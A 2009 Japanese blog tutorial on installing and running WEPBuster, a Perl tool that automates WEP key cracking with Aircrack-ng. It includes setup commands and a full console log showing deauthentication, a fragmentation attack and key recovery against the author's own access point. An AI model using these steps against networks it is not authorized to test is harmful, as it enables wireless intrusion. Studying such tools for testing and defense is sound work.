SSブログ

【 Aircrack-ng 自動化プログラム WEPBuster 1.0】 [Aircrack-ng]

WEPBuster は perl で書かれた WEP クラック自動化スクリプトで、Aircrack-ng を利用している。
aircrack-ng のバージョンは 1.0 rc4 以上が必要だ。

 

2009/10/9 記
BT4 で wepbuster インストールは apt-get で簡単にできる。

apt-get update
apt-get install wepbuster

(以上でインストール終了)
cd /pentest/wireless/wepbuster
perl wepbuster

wepbuster - Project Hosting on Google Code

 

ここからスクリプトをダウンロードして tar で解凍する。 

wepbusterの特長は、

・MACアドレスフィルタリングをバイパスする。
・隠蔽されたSSIDを明らかにする。
・クライアントレスでインジェクション可能。> fragmentation attack
・共有キー認証?
・WEP Decloacking? 将来
・ホワイトリスト、ブラックリスト > APを限定

動画(youtube )は


perl スクリプトだから簡単に導入できると思っていたが、perl のモジュールをいくつかインストールするなど準備が大変だった。準備作業と実行結果を以下に記載するがかなり長文になると思う。

自分の実行環境は以下の通りだ。 

ネットブック MSI Wind U100、 内蔵無線LANカードは、Atheros AR5006EXS
OS,ソフトは、BackTrack 4 prefinal、aircrack-ng 1.0 final、madwifi-ng-r4073

自宅無線 LAN AP は(ソネットから借りている) Aterm WD735GV。

wepbuster を実行する前に、The CPAN Search Site - search.cpan.org からperl のモジュールをいくつかダウンロード、インストールしなければならない。

Term::ReadKey
Expect.pm
IO::Tty
http://search.cpan.org/~stsi/TermReadKey/
http://search.cpan.org/~rgiersig/Expect-1.21/
http://search.cpan.org/~rgiersig/IO-Tty-1.08/

 

TermReadKey-2.30.01.tar.gz
Expect-1.21.tar.gz
IO-Tty-1.08.tar.gz

全部解凍して、インストールする。ポイントは Expect の前に IO-tty をインストールする。
tar xvzf TermReadKey-2.30.01.tar.gz
cd TermReadKey-2.30.01
perl Makefile.PL
make
make test
make install
同様に IO-Tty と Expect もインストールする。

 

madwifi-ng の場合は先ず ath0 を monitor モードにする必要があった。

# airmon-ng stop ath0

 

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

# airmon-ng start wifi0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

その後 wepbuster を実行する。

# cd /home/atc500/wepbuster
# perl wepbuster

Detecting wireless interfaces...

---------------------------------------------------------

Found wifi0...
Getting monitor interface...
monitor interface --> ath0

---------------------------------------------------------

Found ath0...
Getting monitor interface...
monitor interface --> ath0

---------------------------------------------------------

Found ath1...
Getting monitor interface...
monitor interface --> ath1

Found 3 useable wireless card(s)

Select which one to use [1] (You HAVE 3 seconds)

1) ath0/ath0
2) ath0/ath0
3) ath1/ath1

=========================================================

No valid channel entered. Using the default ( US = 1 6 11 )

MODE: crack     (using: ath0/ath0 == XX:XX:XX:XX:XX:XX)
.
Scanning channel 6 for WEP-enabled Access Points
.....
Found 1 AP(s) on channel 6

     BSSID              IV      CHANNEL SSID           ASSOCIATED CLIENTS

xx:xx:xx:xx:xx:xx       2       6       MYAP         xx:xx:xx:xx:xx:xx

.
略(他の家のAP)

Total AP found: 2

Now starting to crack...

#########################################################

Pwning "MYAP" (xx:xx:xx:xx:xx:xx)     Wed Oct  7 17:11:08 2009
Checking for mac filtering...   NONE!! =)
Trying to associate...   SUCCESS!!!
Starting to inject...
Sending Deauth...
Counting IVs...(hit ENTER to skip this AP)
0....0.....0.
Still 0 after 10 seconds...
Sending Deauth...
Sending Deauth...
Counting IVs...
....2.....2.....11.....22.

Still 22 after 30 seconds. =(
This will take forever. Let's try Fragmentation!
Writing output to "fragattack.log"...    (try "tail -f fragattack.log")
Looking for data packets...
Trying replay_src-1007-171128.cap...
GOT KEYSTREAM!! -> fragment-1007-171155.xor
Replaying "forged_arp.cap"...

Fragmentation attack finished. Used 1 packets.
Counting IVs...
....1802.....3714.....5402.....7101.....8759.....10455.
....12103.....13840.....15527...
Collected 17265 IVs. Trying to crack...
KEY FOUND! [ XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: XXXXXXXXXXXX )  Decrypted correctly: 100%
OWNED USING 56832 IVs!
Elapsed Time: 03:28                     Wed Oct  7 17:14:36 2009
.Stopping all forks...

#########################################################

この様に自動でAPを探し出し、正規の無線LANクライアントがいない状況でも自動的にフラグメンテーションアタックをやってくれる。
よく分からないが米国仕様なのか、1,6,11 チャネルしかスキャンしてくれない。
perl wepbuster 8 と8チャネルを指定してもだめだった。(自宅APは いつも8 チャネルにしている)
それから、PCI GW-MF54G2 を持っているが、これは何度やってもだめだった。
フラグメンテーションアタックがうまくいかない AP もあるのかもしれない。 

チャネルの指定方法をご存知ならお教えください。


nice!(0)  コメント(1)  トラックバック(0) 

nice! 0

コメント 1

NO NAME

perl installation with standard libraries (threading support)
- perl modules (http://search.cpan.org)
- Term::ReadKey
- Expect.pm
- Getopt::Long
- File::Slurp
- Number::Range
- Algorithm::Permute
- Pod::Usage

- macchanger (www.alobbs.com/macchanger)

- miscellaneous unix programs
- ifconfig, iwconfig, rm, pkill, stty, cp, touch, mv, route, ping,
dhclient, netstat
by NO NAME (2010-03-06 21:07) 

コメントを書く

お名前:
URL:
コメント:
画像認証:
下の画像に表示されている文字を入力してください。

Facebook コメント

トラックバック 0

この広告は前回の更新から一定期間経過したブログに表示されています。更新すると自動で解除されます。